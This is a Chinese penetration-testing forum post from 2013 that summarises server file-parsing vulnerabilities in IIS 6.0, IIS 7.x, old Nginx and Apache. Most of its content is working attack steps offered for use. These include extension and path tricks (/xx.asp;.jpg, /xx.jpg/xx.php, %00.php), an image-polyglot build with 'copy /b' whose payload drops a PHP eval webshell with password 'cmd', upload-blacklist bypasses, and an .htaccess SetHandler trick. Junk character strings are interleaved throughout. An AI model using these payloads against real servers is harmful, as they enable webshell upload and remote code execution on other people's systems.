中国网络渗透测试联盟
标题:
常见服务器解析漏洞总结
[打印本页]
作者:
admin
时间:
2013-4-19 19:14
标题:
常见服务器解析漏洞总结
Author : laterain
& s: L X/ j u3 I- h
[+]IIS6.0
. B% ]' R7 O- W3 y
* t2 |: i P0 q! ?4 c
目录解析:/xx.asp/xx.jpg
$ {0 g* I, z5 d7 d4 a- m& w
xx.jpg 可替换为任意文本文件(e.g. xx.txt),文本内容为后门代码
# U$ K% z& {! d3 e' T1 Q2 ], a: W
IIS6.0 会将 xx.jpg 解析为 asp 文件。
/ E4 B% q" d0 R8 K5 Z0 @3 @; x; p
后缀解析:/xx.asp;.jpg
) `* |; S) A$ b; k- C( A; w& A. q
IIS6.0 都会把此类后缀文件成功解析为 asp 文件。
) [2 s; N# P P" J$ P
默认解析:/xx.asa
( o: o3 @& P7 b
/xx.cer
( C( E |, b1 h. G3 E. e" P
/xx.cdx
% \9 R; |9 m4 j+ i! i8 J2 s# ]: {# B/ T ^
IIS6.0 默认的可执行文件除了 asp 还包含这三种
6 [) g# e! s! h t
此处可联系利用目录解析漏洞
# Y6 Z' `9 C+ A0 L+ S' G
/xx.asa/xx.jpg 或 /xx.cer/xx.jpg 或 xx.asa;.jpg
5 _, P( ?# _" U, x o
[+]IIS 7.0/IIS 7.5/Nginx <0.8.03
' b4 S$ \% Q0 K2 f5 ]4 G) |9 q8 D
7 m H' h+ u# q S' k& W
IIS 7.0/IIS 7.5/Nginx <0.8.03
# J- E- r0 `# {
在默认Fast-CGI开启状况下,在一个文件路径(/xx.jpg)后面
4 {% W4 Q9 u4 f
加上/xx.php,会将 /xx.jpg/xx.php 解析为 php 文件。
5 S6 _9 C7 ^/ c/ O
常用利用方法:
' U$ |3 t2 `5 `* P: n+ ]- E
将一张图和一个写入后门代码的文本文件合并将恶意文本
+ \8 [% E) S7 Q: Z: e- r) z7 V
写入图片的二进制代码之后,避免破坏图片文件头和尾
$ ^ p+ E# C+ m$ x% F/ G
如:
8 A" W) G) c/ b0 H9 B
copy xx.jpg /b + yy.txt/a xy.jpg
! D" @2 a7 [) j! {2 S5 p3 B
#########################################################
6 V3 o1 t4 |% c7 Y& A$ e
/b 即二进制[binary]模式
4 v z4 w, A- A& ~
/a 即ascii模式
2 V- W. d! M$ \
xx.jpg 正常图片文件
% ]' A! M( q% f7 c, M1 a
yy.txt 内容 <?PHP fputs(fopen('shell.php','w'),
5 g* _( H$ g1 _ \7 C0 p: d9 o
'<?php eval($_POST[cmd])?>');?>
1 s0 y5 W9 M4 y
意思为写入一个内容为 <?php eval($_POST[cmd])?> 名称
- x5 W9 m, ]2 U, g
为shell.php的文件
Z- ?9 w1 Y1 E! w
###########################################################
" Q' x0 L/ L# S
找个地方上传 xy.jpg ,然后找到 xy.jpg 的地址,在地址后加上 /xx.php
1 \7 }- s8 Q# \
即可执行恶意文本。然后就在图片目录下生成一句话木马 shell.php
# v" k; y8 P3 D/ R6 o t2 i
密码 cmd
% u3 A8 U' v; a* h, H
[+]Nginx <0.8.03
, V" y f7 r! Y. w2 s9 g$ p" o
8 ]/ P& f: K/ d$ W
在Fast-CGI关闭的情况下,Nginx <0.8.03依然存在解析漏洞
- o2 g( Z) ?2 d
在一个文件路径(/xx.jpg)后面加上%00.php
" I+ b: M0 C; h8 ] {
会将 /xx.jpg%00.php 解析为 php 文件。
# j5 {4 Z- V# a( U& v0 w
[+]Apache<0.8.03
& ]: J6 T. f# q# f$ t* }! c9 k9 d
* x8 O5 E8 g5 b# p2 L2 g7 `
后缀解析:test.php.x1.x2.x3
7 n4 _0 D# u* J3 m9 ~) v Y3 X
Apache将从右至左开始判断后缀,若x3非可识别后缀,
+ u- u# @) t1 p+ Z! W
再判断x2,直到找到可识别后缀为止,然后将该可识别
, f7 a, A: O8 L( X3 A1 K1 o
后缀进解析test.php.x1.x2.x3 则会被解析为php
. g; W, Z; b& A4 H4 i, C
经验之谈:php|php3|phtml 多可被Apache解析。
) O! T. U7 ^' d, u
[+]其他一些可利用的
# Z2 B& c1 _, h9 n% O7 ^
8 {; ]* E" S/ D) Z6 s7 N+ \
在windows环境下,xx.jpg[空格] 或xx.jpg. 这两类文件都是不允许存在的
" y/ J( }, @3 @2 g: p% _1 |
若这样命名,windows会默认除去空格或点,这也是可以被利用的!
! Q3 F5 F4 S+ F: C* a
在向一台windows主机上传数据时,你可以抓包修改文件名,在后面加个空格
% O$ Q* p) E7 p; z" R" o, w
或点,试图绕过黑名单,若上传成功,最后的点或空格都会被消除,这样就可
$ p+ Y3 ?2 B. G' T/ j
得到shell。我记得Fck Php 2.6就存在加空格绕过的漏洞。
R. `/ G' O5 V1 u" ~
{Linux主机中不行,Linux允许这类文件存在}
& b/ C" t. R0 t0 {9 { H
如果在Apache中.htaccess可被执行(默认不执行,这是90sec里的一位朋友说
# n f, S& ?* G( m* e
的,当初我并不知道),且可以被上传,那可以尝试在
; o! e, B, A" M& v1 B
.htaccess中写入:
N; Y$ A; _ E: Q {# s
<FilesMatch “shell.jpg”>
6 G5 k1 Q- m( @3 J: H7 n5 y& s
SetHandler application/x-httpd-php
w; E% d: {4 y
</FilesMatch>
8 z1 S. s3 W2 I9 o' J% a
shell.jpg换成你上传的文件,这样shell.jpg就可解析为php文件
# q) k1 `' _$ v! u. t; G2 A
[+]错误修改
/ l, M& E" k6 ?4 U
5 d0 Q/ Q0 t; k, |
在 IIS 6.0 下可解析 /xx.asp:.jpg
2 i* k& B% }7 z
{/xx.asp:.jpg 此类文件在Windows下不允许存在,:.jpg被自动除去
+ e3 z! f2 x% m% M
剩下/xx.asp}修改:
5 [- G+ {( ]; h0 O8 c9 l
先谢谢核攻击的提醒
# s" \- h$ J9 t6 {
当上传一个/xx.asp:.jpg文件时,的确:.jpg会消失,但是现在的/xx.asp
, X* w0 s3 O% v/ M: e
里是没有任何内容的,因为。。不好解释 大家自己看
0 p8 f) T. X& }; _: c `3 y
http://lcx.cc/?i=2448
! }1 y3 ]* M6 v* x2 U8 M
http://baike.baidu.com/view/3619593.htm
5 h ^# x5 R8 ?, w7 r1 o
1 i; M1 S4 @' O5 \1 ?; ]
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2